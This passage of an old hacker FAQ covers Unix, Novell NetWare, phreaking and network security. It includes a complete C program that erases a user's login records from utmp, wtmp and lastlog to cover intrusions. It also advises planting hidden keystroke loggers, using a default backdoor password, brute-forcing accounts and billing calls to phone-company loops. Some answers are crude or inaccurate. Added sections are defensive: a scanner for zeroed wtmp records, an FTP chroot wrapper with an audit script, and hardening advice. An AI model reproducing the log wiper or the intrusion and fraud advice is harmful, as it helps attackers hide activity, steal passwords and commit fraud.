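modern:$6$examplesalt$examplehash:503:100::/home/modern:/bin/sh
broken:x:504
"""

if __name__ == "__main__":
    for lineno, user, status in audit_passwd(SAMPLE):
        print(f"line {lineno}: {user:8} {status}")
```

Entries reported as "hash" should be migrated to the shadow mechanism of the platform, and "empty" entries should be locked or given a password.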

Q. Where is the password file located?

A. The password file is located in the etc/passwd dir. You can get into the etc dir by logging on to the domain via anonymous ftp.

Q. What is an exploit?

A. An exploit is something that exploits unix or another kind of OS. You usually use exploits to gain root or high access to a system. They can prove to be very handy.

Q. What are some basic telnet commands?

A. Below is a list of common telnet commands.

Command     Function

access      Telnet account
c           Connect to a host
cont        Continue
d           Disconnect
full        Network echo
half        Terminal echo
hangup      Hangs up
mail        Mail
set         Select PAD parameters
stat        Show network port.
telemail    Mail

Q. How do I get out of the log file?

A. Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text files that can be edited by hand with vi, you must use a program specifically written for this purpose.
Example:

#include
#include
#include
#include
#include
#include
#include
#include
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"

int f;

void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;

if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}

void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;

pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {

while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}

void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;

if ((pwd=getpwnam(who))!=NULL) {

if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}

} else printf("%s: ?\n",who);
}

main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("Zap2!\n");
} else
printf("Error.\n");
}
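
The program above overwrites matching records with zeros in place, so the file keeps its size and a blank record stays behind where the login used to be. The following scanner is an added example, not part of the original FAQ: it looks for such records in a wtmp image and uses the neighbouring records to bracket when the erased event happened. The 384-byte glibc/Linux x86-64 record layout and all sample users, hosts and timestamps are assumptions constructed for illustration.

```python
import struct
import sys
import time

# One glibc/Linux x86-64 utmp record is 384 bytes (assumption of this example;
# other platforms, including the older systems the program above was written
# for, use different layouts, so adjust the format string there).
UTMP = struct.Struct("<hxxi32s4s32s256shhiii4i20s")
USER_PROCESS = 7          # ut_type of a normal login record on Linux


def make_record(user, line, host, when, pid=1000):
    """Pack one login record; only used to construct the sample below."""
    return UTMP.pack(USER_PROCESS, pid, line.encode(), b"", user.encode(),
                     host.encode(), 0, 0, 0, when, 0, 0, 0, 0, 0, b"")


def split_records(blob):
    """Return [(index, raw_bytes, tv_sec)] for every complete record."""
    out = []
    for i in range(len(blob) // UTMP.size):
        raw = blob[i * UTMP.size:(i + 1) * UTMP.size]
        out.append((i, raw, UTMP.unpack(raw)[9]))   # field 9 is ut_tv.tv_sec
    return out


def scan(blob):
    """Find records that were overwritten with zeros in place."""
    recs = split_records(blob)
    live = [(i, t) for i, raw, t in recs if any(raw)]
    wiped = []
    for i, raw, _ in recs:
        if any(raw):
            continue                      # at least one non-zero byte: normal
        earlier = [t for j, t in live if j < i]
        later = [t for j, t in live if j > i]
        wiped.append({
            "index": i,
            "offset": i * UTMP.size,
            # wtmp is normally appended to in time order, so the
            # neighbouring records bracket the lost event
            "window_start": earlier[-1] if earlier else None,
            "window_end": later[0] if later else None,
        })
    return {"records": len(recs), "wiped": wiped,
            "trailing_bytes": len(blob) % UTMP.size}


def constructed_sample():
    """Three logins, then the middle one zeroed the way bzero()+write() would."""
    t0 = 1_700_000_000
    recs = [make_record("alice", "pts/0", "10.0.0.5", t0),
            make_record("mallory", "pts/1", "203.0.113.9", t0 + 600),
            make_record("bob", "pts/2", "10.0.0.7", t0 + 1200)]
    recs[1] = bytes(UTMP.size)
    return b"".join(recs)


def fmt(ts):
    """Render a timestamp, or 'unknown' when no neighbour record exists."""
    return "unknown" if ts is None else time.strftime(
        "%Y-%m-%d %H:%M:%S UTC", time.gmtime(ts))


if __name__ == "__main__":
    # Pass a path to a copy of wtmp, or run with no argument for the sample.
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            data = fh.read()
    else:
        data = constructed_sample()
    report = scan(data)
    print(f"{report['records']} records, {report['trailing_bytes']} trailing bytes")
    for w in report["wiped"]:
        print(f"zeroed record #{w['index']} at offset {w['offset']}: "
              f"event between {fmt(w['window_start'])} and {fmt(w['window_end'])}")
```

A hit is a lead to corroborate against logs the program does not touch, such as syslog forwarded to another host or process accounting.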

Q. What is DNIC?

A. A DNIC says which network connects to the telnet you are using.

Q. What is NUA?

A. The NUA is the address of the computer on telnet.

Q. What is a VAX/VMS?

A. A VAX/VMS is Digital Equipment's major computer line. Its proprietary operating system is known as VMS.

Q. What is telnet?

A. Telnet is a program which lets you log in to other computers on the net.

Q. What is an anonymous remailer?

A. An anonymous remailer is a system on the Internet that allows you to send e-mail anonymously or post messages to Usenet anonymously. You apply for an anonymous ID at the remailer site. Then, when you send a message to the remailer, it sends it out from your anonymous ID at the remailer. No one reading the post will know your real account name or host name. If someone sends a message to your anonymous ID, it will be forwarded to your real account by the remailer.

Q. What is PGP?

A. This FAQ answer is excerpted from:
PGP(tm) User's Guide Volume I: Essential Topics by Philip Zimmermann
PGP(tm) uses public-key encryption to protect E-mail and data files. Communicate securely with
people you've never met, with no secure channels needed for prior exchange of keys. PGP is well
featured and fast, with sophisticated key management, digital signatures, data compression, and
good ergonomic design.
Pretty Good(tm) Privacy (PGP), from Phil's Pretty Good Software, is a high security cryptographic software application for MS-DOS, Unix, VAX/VMS, and other computers. PGP allows people to exchange files or messages with privacy, authentication, and convenience. Privacy means that only those intended to receive a message can read it. Authentication means that messages that appear to be from a particular person can only have originated from that person. Convenience means that privacy and authentication are provided without the hassles of managing keys associated with conventional cryptographic software. No secure channels are needed to exchange keys between users, which makes PGP much easier to use. This is because PGP is based on a powerful new technology called "public key" cryptography. PGP combines the convenience of the Rivest-Shamir-Adleman (RSA) public key cryptosystem with the speed of conventional cryptography, message digests for digital signatures, data compression before encryption, good ergonomic design, and sophisticated key management. And PGP performs the public-key functions faster than most other software implementations. PGP is public key cryptography for the masses.

Q. What is tcp/ip?

A. Tcp/ip is the system networks use to communicate with each other. It stands for Transmission Control Protocol/Internet Protocol.

Q. What is a virus?

A. A Virus is a program which reproduces itself. It may attach itself to other programs, it may create copies of itself. It may damage or corrupt data, change data, or degrade the performance of your system by utilizing resources such as memory or disk space. Some Virus scanners detect some Viruses. No Virus scanners detect all Viruses. Virus scanners will work for a while but people are always creating virii that will beat them.

Q. What is a trojan?

A. A trojan is a program which does an unauthorized function, hidden inside an authorized program. It does something other than it claims to do, usually something malicious, and it is intended by the author to do whatever it does. If it is not intentional, it is called a bug.

Q. What is a worm?

A. Worms are programs that copy themselves over and over using up space and slowing down the system. They are self contained and use the networks to spread, in much the same way that Viruses use files to spread. Some people say the solution to Viruses and worms is to just not have any files or networks.


Q. What do I need to become a hacker?

A. You should start off with a good scanner, some dialups, a telnet client, and some knowledge of hacking. Those are the basic things that you will need. If you are serious about hacking then you should get Unix, or Linux (smaller, free version of unix).

Q. What are some common accounts for Novell Netware?

A. Below is a list of commonly used accounts for Novell Netware.

Account           Purpose
----------------  ------------------------------------------------------
PRINT             Attaching to a second server for printing
LASER             Attaching to a second server for printing
HPLASER           Attaching to a second server for printing
PRINTER           Attaching to a second server for printing
LASERWRITER       Attaching to a second server for printing
POST              Attaching to a second server for email
MAIL              Attaching to a second server for email
GATEWAY           Attaching a gateway machine to the server
GATE              Attaching a gateway machine to the server
ROUTER            Attaching an email router to the server
BACKUP            May have password/station restrictions (see below), used
                  for backing up the server to a tape unit attached to a
                  workstation. For complete backups, Supervisor equivalence
                  is required.
WANGTEK           See BACKUP
FAX               Attaching a dedicated fax modem unit to the network
FAXUSER           Attaching a dedicated fax modem unit to the network
FAXWORKS          Attaching a dedicated fax modem unit to the network
TEST              A test user account for temp use
ARCHIVIST         Palindrome default account for backup
CHEY_ARCHSVR      An account for Arcserve to login to the server from
                  the console for tape backup. Version 5.01g's
                  password was WONDERLAND. Delete the Station
                  Restrictions and use SUPER.EXE to toggle this
                  account and you have an excellent backdoor.
WINDOWS_PASSTHRU  Although not required, per the Microsoft Win95
                  Resource Kit, Ch. 9 pg. 292 and Ch. 11 pg. 401 you
                  need this for resource sharing without a password.

Q. How can I gain supervisor access to Novell Netware?

A. Taken from the Novell Netware FAQ.
The secret method is the method of using a DOS-based sector editor to edit the
entry in the FAT, and reset the bindery to default upon server reboot. This gives
you Supervisor and Guest with no passwords. The method was taught in case you
lost Supervisor on a Netware 2.15 server and you had no supe equivalent accounts
created. It also saves the server from a wipe and reboot in case the Supervisor account is corrupt, deleted, or trashed.


Q. How do I access the password file for Novell?

A. Access to the password file in Netware is not like Unix - the password file isn't in the open. All objects and their properties are kept in the bindery files on 2.x and 3.x, and kept in the NDS database in 4.x. An example of an object might be a printer, a group, an individual's account etc. An example of an object's properties might include an account's password or full user name, or a group's member list or full name. The bindery files' attributes (or flags) in 2.x and 3.x are Hidden and System, and these files are located on the SYS: volume in the SYSTEM subdirectory. Their names are as follows:

Netware version    File Names
---------------    ----------
2.x                NET$BIND.SYS, NET$BVAL.SYS
3.x                NET$OBJ.SYS, NET$PROP.SYS, NET$VAL.SYS

The NET$BVAL.SYS and NET$VAL.SYS are where the passwords are actually located
in 2.x and 3.x respectively.


Q. How do I crack a Novell password?

A. Taken from the Novell Netware Hack FAQ.

If Intruder Detection is off, you can use a "brute force" password cracker.

Encrypted passwords is Novell's way of protecting passwords from sniffers.
Since older versions of Netware (2.15c) sent passwords as plain text over the
wire, a sniffer could see the password as it went by. To secure things,
Novell gave the administrator a way to control this. Later versions of the
LOGIN.EXE program would encrypt the password before transmitting it across
the wire to the server. But before this could happen, the shell (NETX) had
to be updated. Since some locations had to have older shells and older
versions of LOGIN.EXE to support older equipment, the administrator has the
option of allowing unencrypted passwords to access the server. This is done
by typing SET ALLOW UNENCRYPTED PASSWORDS=ON at the console or by adding it
to the AUTOEXEC.NCF. The default is OFF, which means NOVELBFH could be beeping
the server console every attempt! Fortunately most sites turn this switch on to
support some old device.

If you have access to the console, either by standing in front of it or by
RCONSOLE, you can use SETSPASS.NLM, SETSPWD.NLM or SETPWD.NLM to reset passwords.
Just load the NLM and pass it command line parameters:

NLM            Account(s) reset     Netware version(s) supported
------------   -----------------    ----------------------------
SETSPASS.NLM   SUPERVISOR           3.x
SETSPWD.NLM    SUPERVISOR           3.x, 4.x
SETPWD.NLM     any valid account    3.x, 4.x

If you can plant a password catcher or keystroke reader, you can get them
this way. The LOGIN.EXE file is located in the SYS:LOGIN directory, and
normally you will not have access to put a file in that directory. The best
place to put a keystroke capture program is in the workstation's path, with
the ATTRIB set as hidden. The advantage is that you'll get the password and
Netware won't know you swiped it. The disadvantage is getting access to the
machine to do this. The very best place to put one of these capture programs
is on a common machine, like a pcAnywhere box, which is used for remote access.
Many locations will allow pcAnywhere access to a machine with virtually no
software on it, and control security access to the LAN by using Netware's
security features. Uploading a keystroke capture program to a machine like
this defeats this.

Q. What are the domain codes?

A. Below is the current list of domain codes.
AD Andorra
AE United Arab Emirates
AF Afghanistan
AG Antigua and Barbuda
AI Anguilla
AL Albania
AM Armenia
AN Netherland Antilles
AO Angola
AQ Antarctica
AR Argentina
AS American Samoa
AT Austria
AU Australia
AW Aruba
AZ Azerbaidjan
BA Bosnia-Herzegovina
BB Barbados
BD Bangladesh
BE Belgium
BF Burkina Faso
BG Bulgaria
BH Bahrain
BI Burundi
BJ Benin
BM Bermuda
BN Brunei Darussalam
BO Bolivia
BR Brazil
BS Bahamas
BT Bhutan
BV Bouvet Island
BW Botswana
BY Belarus
BZ Belize
CA Canada
CC Cocos (Keeling) Islands
CF Central African Republic
CG Congo
CH Switzerland
CI Ivory Coast
CK Cook Islands
CL Chile
CM Cameroon
CN China
CO Colombia
CR Costa Rica
CS Czechoslovakia
CU Cuba
CV Cape Verde
CX Christmas Island
CY Cyprus
CZ Czech Republic
DE Germany
DJ Djibouti
DK Denmark
DM Dominica
DO Dominican Republic
DZ Algeria
EC Ecuador
EE Estonia
EG Egypt
EH Western Sahara
ES Spain
ET Ethiopia
FI Finland
FJ Fiji
FK Falkland Islands (Malvinas)
FM Micronesia
FO Faroe Islands
FR France
FX France (European Territory)
GA Gabon
GB Great Britain (UK)
GD Grenada
GE Georgia
GH Ghana
GI Gibraltar
GL Greenland
GP Guadeloupe (French)
GQ Equatorial Guinea
GF Guyana (French)
GM Gambia
GN Guinea
GR Greece
GT Guatemala
GU Guam (US)
GW Guinea Bissau
GY Guyana
HK Hong Kong
HM Heard and McDonald Islands
HN Honduras
HR Croatia
HT Haiti
HU Hungary
ID Indonesia
IE Ireland
IL Israel
IN India
IO British Indian Ocean Territory
IQ Iraq
IR Iran
IS Iceland
IT Italy
JM Jamaica
JO Jordan
JP Japan
KE Kenya
KG Kirgistan
KH Cambodia
KI Kiribati
KM Comoros
KN Saint Kitts Nevis Anguilla
KP North Korea
KR South Korea
KW Kuwait
KY Cayman Islands
KZ Kazachstan
LA Laos
LB Lebanon
LC Saint Lucia
LI Liechtenstein
LK Sri Lanka
LR Liberia
LS Lesotho
LT Lithuania
LU Luxembourg
LV Latvia
LY Libya
MA Morocco
MC Monaco
MD Moldavia
MG Madagascar
MH Marshall Islands
ML Mali
MM Myanmar
MN Mongolia
MO Macau
MP Northern Mariana Islands
MQ Martinique (French)
MR Mauritania
MS Montserrat
MT Malta
MU Mauritius
MV Maldives
MW Malawi
MX Mexico
MY Malaysia
MZ Mozambique
NA Namibia
NC New Caledonia (French)
NE Niger
NF Norfolk Island
NG Nigeria
NI Nicaragua
NL Netherlands
NO Norway
NP Nepal
NR Nauru
NT Neutral Zone
NU Niue
NZ New Zealand
OM Oman
PA Panama
PE Peru
PF Polynesia (French)
PG Papua New
PH Philippines
PK Pakistan
PL Poland
PM Saint Pierre and Miquelon
PN Pitcairn
PT Portugal
PR Puerto Rico (US)
PW Palau
PY Paraguay
QA Qatar
RE Reunion (French)
RO Romania
RU Russian Federation
RW Rwanda
SA Saudi Arabia
SB Solomon Islands
SC Seychelles
SD Sudan
SE Sweden
SG Singapore
SH Saint Helena
SI Slovenia
SJ Svalbard and Jan Mayen Islands
SK Slovak Republic
SL Sierra Leone
SM San Marino
SN Senegal
SO Somalia
SR Suriname
ST Saint Tome and Principe
SU Soviet Union
SV El Salvador
SY Syria
SZ Swaziland
TC Turks and Caicos Islands
TD Chad
TF French Southern Territory
TG Togo
TH Thailand
TJ Tadjikistan
TK Tokelau
TM Turkmenistan
TN Tunisia
TO Tonga
TP East Timor
TR Turkey
TT Trinidad and Tobago
TV Tuvalu
TW Taiwan
TZ Tanzania
UA Ukraine
UG Uganda
UK United Kingdom
UM US Minor Outlying Islands
US United States
UY Uruguay
UZ Uzbekistan
VA Vatican City State
VC Saint Vincent and Grenadines
VE Venezuela
VG Virgin Islands (British)
VI Virgin Islands (US)
VN Vietnam
VU Vanuatu
WF Wallis and Futuna Islands
WS Samoa
YE Yemen
YU Yugoslavia
ZA South Africa
ZM Zambia
ZR Zaire
ZW Zimbabwe
ARPA Old style Arpanet
COM US Commercial
EDU US Educational
GOV US Government
INT International
MIL US Military
NATO Nato field
NET Network
ORG Non-Profit



Q. What is phreaking?

A. Phreaking is anything illegal that has to do with phones and phone lines.

Q. How do I start phreaking?

A. You should start by learning about boxes and reading up on different types of phreaking.

Q. What kind of boxes are there?

A. Below is a list of the most common boxes and what they do.

Acrylic Box - Steal Three-Way-Calling and Call Waiting.
Aero Box - Make free fone calls from Payfones.
Aqua Box - Drain voltage from a FBI Lock In Trace call.
Beige Box - Replicates a lineman's handset.
Black Box - Allows the calling party not to get charged for the call they place.
Blast Box - Fone Microphone Amplifier.
Blotto Box - Shorts every fone out in the area.
Blue Box - Utilizing 2600Hz tones for free fone calls.
Brown Box - Creates a party line from 2 existing fone lines.
Bud Box - Used to tap into your neighbor's fone line.
Busy Box - Used to kill the dial tone on someone's fone.
Chartreuse Box - Use the electricity from your phone for other things.
Cheese Box - Turns your fone into a Payfone.
Chrome Box - Lets you manipulate traffic signals via remote control.
Clear Box - Used to make free calls on Fortress Fones.
Copper Box - Causes cross-talk interference on an extender.
Crimson Box - Acts as a 'Hold' button for your fone.
Dark Box - Reroutes outgoing or incoming calls to another fone.
Dayglo Box - Allows you to connect to your neighbor's fone line.
Ditto Box - Allows you to eavesdrop on another fone line.
Divertor Box - Reroutes outgoing or incoming calls to another fone.
DLOC Box - Lets you conference 2 fone lines (other than your own).
Gold Box - Allows you to trace a call or tell if it's being traced.
Green Box - Lets you make the Coin Collect, Coin Return, and Ringback tones.
Jack Box - A touch-tone keypad.
Light Box - An AM Transmitter.
Lunch Box - Used to tap into your neighbor's fone line.
Magenta Box - Connects one remote fone line to another remote fone line.
Mauve Box - Lets you fone tap without cutting into the fone line.
Neon Box - An external microphone.
New Gold Box - A new updated version of the Gold Box.
Noise Box - Creates line noise.
Olive Box - Used as an external ringer.
Paisley Box - A combination of almost all the boxes there are.
Pandora Box - Creates a high intensity tone which can cause pain. Good for pranking.
Party Box - Lets you make a party line from 2 fone lines.
Pearl Box - A tone generator.
Pink Box - Lets you hook 2 separate fone lines together and have 3 way calling.
Purple Box - A fone hold button.
Rainbow Box - Kills a trace by putting 120v into the fone line.
Red Box - Lets you make free calls from a payfone by producing the coin tones.
Rock Box - Adds music to your fone line.
Scarlet Box -
Silver Box - Adds DTMF A, B, C, & D priority tones to your line.
Slush Box - Can be installed at places of business that have standard multi-line fones.
Static Box - Keep voltage on a fone line high.
Switch Box - Adds hold, indicator lights, conference, etc.
Tan Box - Line activated telefone recorder.
Tron Box - Reverse the phase of power to your house, and make your meter run slower.
Urine Box - Makes a disturbance between the ring and tip wires in someone's fone.
Violet Box - Keeps a payfone from hanging up.
White Box - A portable DTMF keypad.
Yellow Box - Add an extension fone.

Q. How do I make a box?

A. Each box has a separate plan to set it up. Just do a netsearch for phreaking or boxes and you can find all the plans you need.

Q. What is a loop?

A. This FAQ answer is excerpted from:
ToneLoc v0.99 User Manual by Minor Threat & Mucho Maas
Loops are a pair of phone numbers, usually consecutive, like 836-9998 and 836-9999. They are
used by the phone company for testing. What good do loops do us? Well, they are cool in a few
ways. Here is a simple use of loops. Each loop has two ends, a 'high' end, and a 'low' end. One end
gives a (usually) constant, loud tone when it is called. The other end is silent. Loops don't usually
ring either. When BOTH ends are called, the people that called each end can talk through the loop.
Some loops are voice filtered and won't pass anything but a constant tone; these aren't much use to
you. Here's what you can use working loops for: billing phone calls! First, call the end that gives the loud tone. Then if the operator or someone calls the other end, the tone will go quiet. Act like the phone just rang and you answered it ... say "Hello", "Allo", "Chow", "Yo", or what the fuck ever. The operator thinks that she just called you, and that's it! Now the phone bill will go to the loop, and your local RBOC will get the bill! Use this technique in moderation, or the loop may go down. Loops are probably most useful when you want to talk to someone to whom you don't want to give your phone number.

Q. How do I set up an anonymous FTP?

A. Taken from the Internet Security Systems, Inc. text on setting up an anonymous ftp.
1. Build a statically linked version of ftpd and put it in ~ftp/bin. Make sure it's owned by root.
2. Build a statically linked version of /bin/ls if you'll need one. Put it in ~ftp/bin. If you are on a Sun, and need to build one, there's a ported version of the BSD net2 ls command for SunOs on ftp.tis.com: pub/firewalls/toolkit/patches/ls.tar.Z Make sure it's owned by root.
3. Chown ~ftp to root and make it mode 755. THIS IS VERY IMPORTANT.
4. Set up copies of ~ftp/etc/passwd and ~ftp/etc/group just as you would normally, EXCEPT make 'ftp's home directory '/' -- make sure they are owned by root.
5. Write a wrapper to kick ftpd off and install it in /etc/inetd.conf. The wrapper should look something like: (assuming ~ftp = /var/ftp)

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    int main(void)
    {
        /* enter the FTP area first, then make it the root directory */
        if (chdir("/var/ftp")) {
            perror("chdir /var/ftp");
            exit(1);
        }
        if (chroot("/var/ftp")) {
            perror("chroot /var/ftp");
            exit(1);
        }
        /* optional: seteuid(FTPUID); */
        /* this path is resolved inside the new root: /var/ftp/bin/ftpd */
        execl("/bin/ftpd", "ftpd", "-l", (char *)0);
        perror("exec /bin/ftpd");
        exit(1);
    }

Options:
You can use 'netacl' from the toolkit or tcp_wrappers to achieve the same effect.
We use 'netacl' to switch so that a few machines that connect to the FTP service *don't* get
chrooted first. This makes transferring files a bit less painful.
You may also wish to take your ftpd sources and find all the places where it calls seteuid()
and remove them, then have the wrapper do a setuid(ftp) right before the exec. This means
that if someone knows a hole that makes them "root" they still won't be. Relax and imagine
how frustrated they will be.
If you're hacking ftpd sources, I suggest you turn off a bunch of the options in ftpcmd.y by
unsetting the "implemented" flag in ftpcmd.y. This is only practical if your FTP area is
read-only.
6. As usual, make a pass through the FTP area and make sure that the files are in correct modes and that there's nothing else in there that can be executed.
7. Note, now, that your FTP area's /etc/passwd is totally separated from your real /etc/passwd. This has advantages and disadvantages.
8. Some stuff may break, like syslog, since there is no /dev/log. Either build a version of ftpd with a UDP-based syslog() routine or run a second syslogd based on the BSD Net2 code, that maintains a unix-domain socket named ~ftp/dev/log with the -p flag.
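
The ownership and mode requirements in the steps above can be checked mechanically after setup and again after every change to the FTP area. The following audit is an added example, not part of the ISS text: the problem names, the reading of "correct modes" as "nothing group- or world-writable" (which assumes a read-only FTP area) and the sample tree are assumptions constructed for illustration.

```python
import os
import stat
import tempfile


def audit_ftp_area(root, owner_uid=0):
    """Return sorted (relative_path, problem) pairs for an anonymous-FTP tree."""
    root = os.path.abspath(root)
    findings = []

    def rel(path):
        return os.path.relpath(path, root)

    def check_owner(path):
        if os.lstat(path).st_uid != owner_uid:
            findings.append((rel(path), "wrong-owner"))

    # Step 3: ~ftp itself is owned by root and is mode 755.
    check_owner(root)
    if stat.S_IMODE(os.lstat(root).st_mode) != 0o755:
        findings.append((".", "mode-not-755"))

    # Step 4: the private passwd and group copies exist and are root-owned.
    for name in ("etc/passwd", "etc/group"):
        path = os.path.join(root, name)
        if os.path.isfile(path):
            check_owner(path)
        else:
            findings.append((name, "missing"))

    bin_dir = os.path.join(root, "bin")
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue                  # a symlink's own mode says nothing
            mode = stat.S_IMODE(st.st_mode)
            # Step 6 ("correct modes"), read here as: nothing that a
            # non-root user could modify (assumes a read-only FTP area).
            if mode & 0o022:
                findings.append((rel(path), "group-or-world-writable"))
            if stat.S_ISREG(st.st_mode) and mode & 0o111:
                if dirpath == bin_dir:
                    check_owner(path)     # steps 1-2: ftpd and ls owned by root
                else:
                    findings.append((rel(path), "executable-outside-bin"))
    return sorted(findings)


def build_constructed_tree():
    """Create a throwaway sample tree with two deliberate mistakes."""
    root = tempfile.mkdtemp(prefix="ftp-area-")
    layout = {"bin/ftpd": 0o755, "bin/ls": 0o755,
              "etc/passwd": 0o644, "etc/group": 0o644,
              "pub/README": 0o644,
              "pub/fetch.sh": 0o755}      # mistake: executable in pub/
    for name, mode in layout.items():
        path = os.path.join(root, name)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
        os.chmod(path, mode)
    incoming = os.path.join(root, "pub", "incoming")
    os.mkdir(incoming)
    os.chmod(incoming, 0o777)             # mistake: world-writable directory
    for d in ("", "bin", "etc", "pub"):
        os.chmod(os.path.join(root, d), 0o755)
    return root


if __name__ == "__main__":
    sample = build_constructed_tree()
    # The sample is owned by whoever runs this, so audit against that uid;
    # on a real server keep the default owner_uid=0 and pass ~ftp.
    for path, problem in audit_ftp_area(sample, owner_uid=os.getuid()):
        print(f"{problem:26} {path}")
```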

Q. What are some ways I can secure a network?

A. Taken from the Internet Security Systems text on securing a network.
1. Well first of all you should know what type of resources that you're trying to protect: CPU, files, storage devices, phone lines, etc...
2. Determine the host-specific security measures needed. Password protection, file encryption, firewall, etc...
   Determine who the computer systems must be defended from.
   Determine the likelihood of a threat.
   Implement measures to protect network resources.

3. Consider the corporate budget when planning for Internet Security.

4. Design a Security Policy that describes your organization's network security
concerns. This policy should take into account the following:

Network Security Planning
Site Security Policy
Risk Analysis
Risk analysis involves determining the following:
What you need to protect
What you need to protect it from
How to protect it
Estimating the risk of losing the resource
Estimating the importance of the resource

5. Consider the following factors to determine who will grant access to services on your
networks:
Will access to services be granted from a central point?
What methods will you use to create accounts and terminate access?

6. Design and Implement Packet Filter Rules

7. Ensure your Firewall has the following properties:
All traffic from inside to outside, as well as outside to inside must pass through the
firewall.
Allow only authorized traffic as defined by your corporate security policy be
passed through the firewall.
Ensure the firewall is immune to penetration.

8. Educate users about password protection:
Educating users not to use passwords that are easy to guess.
Ensuring the password lengths are adequate.
Running a password guesser.
Requiring the use of a password generator.
Always using a mixture of upper- and lowercase characters.
Always using at least one or two non-alphanumeric characters.
Never using dictionary words or ones spelled backwards.
Never using a portion or variation of a proper name, address or anything that
could obviously identify you (the user).

9. Security-related organizations play an integral role in the development and
deployment of Internet technologies. Keep abreast of the latest in security-related
activities by visiting their Web sites. Here are some key security-related organizations
which aid corporations such as yours in keeping the Internet a safer place to compute:
ACM/SIGSAC at gopher://gopher.acm.org/.
CERT (a 24-hour Computer Emergency Response Team) at:
ftp://info.cert.org/pub/cert_faq and
http://www.sei.cmu.edu/SEI/programs/cert.html.
CIAC (U.S. Department of Energy's Computer Incident Advisory
Capability) at: http://ciac.llnl.gov/
CPSR (Computer Professionals for Social Responsibility) at:
http://cpsr.org.home
EFF (Electronic Frontier Foundation) at: http://www.eff.org/
EPIC (Electronic Privacy Information Center) at: http:/epic.org/
FIRST (Forum of Incident Response and Security Teams) at:
http://first.org/first/
Internet Society at http://www.isoc.org/

Q. What is a "rainbow book?"

A. Rainbow Books are books on security. The current book listing is listed below.

Orange Book- Department of Defense Trusted Computer System Evaluation Criteria.
Green Book- Department of Defense Password Management Guideline.
Yellow Book- Guidance for Applying the Department of Defense Trusted Computer System Evaluation Criteria in Specific Environments.
Tan Book- A Guide to Understanding Audit in Trusted Systems.
Bright Blue Book- A Guide for Vendors.
Neon Orange Book- A Guide to Understanding Discretionary Access Control in Trusted Systems.
Teal Green Book- Glossary of Computer Security Terms.
Red Book- Trusted Network Interpretation of the Trusted Computer System Evaluation Criteria.
Burgundy Book- A Guide to Understanding Design Documentation in Trusted Systems.
Dark Lavender Book- A Guide to Understanding Trusted Distribution in Trusted Systems.
Venice Blue Book- Computer Security Subsystem Interpretation of the Trusted Computer System Evaluation Criteria.
Aqua Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understanding Security Modeling in Trusted Systems.
Dark Red Book- Guidance for Applying the Trusted Network Interpretation.
Pink Book- Department of Defense Trusted Computer System Evaluation Criteria Rating Maintenance Phase.
Purple Book- Department of Defense Trusted Computer System Evaluation Criteria Guidelines for Formal Verification Systems.
Brown Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understanding Trusted Facility Management.
Yellow-Green Book- Department of Defense Trusted Computer System Evaluation Criteria Guidelines for Writing Trusted Facility Manuals.
Light Blue Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understanding Identification and Authentication in Trusted Systems.
Blue Book- Department of Defense Trusted Computer System Evaluation Criteria Trusted Product Evaluation Questionnaire.
Grey Book- Department of Defense Trusted Computer System Evaluation Criteria Trusted Unix Working Group (TRUSIX) Rationale for Selecting Access Control List Features for the Unix System.
Lavender Book- Department of Defense Trusted Computer System Evaluation Criteria Trusted Data Base Management System Interpretation of the Trusted Computer System Evaluation Criteria.
Bright Orange Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understanding Security Testing and Test Documentation in Trusted Systems.
Hot Peach Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Writing the Security Features User's Guide for Trusted Systems.
Turquoise Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understanding Information System Security Officer Responsibilities for Automated Information Systems.
Violet Book- Department of Defense Trusted Computer System Evaluation Criteria Assessing Controlled Access Protection.
Light Pink Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understanding Covert Channel Analysis of Trusted Systems.
C1 Technical Report-001- Department of Defense Trusted Computer System Evaluation Criteria Computer Viruses: Prevention, Detection, and Treatment.
C Technical Report 79-91- Department of Defense Trusted Computer System Evaluation Criteria Integrity in Automated Information Systems.
C Technical Report 39-92- Department of Defense Trusted Computer System Evaluation Criteria The Design and Evaluation of INFOSEC systems: The Computer Security Contributions to the Composition Discussion.
NTISSAM COMPUSEC/1-87- Department of Defense Trusted Computer System Evaluation Criteria Advisory Memorandum on Office Automation Security Guideline.



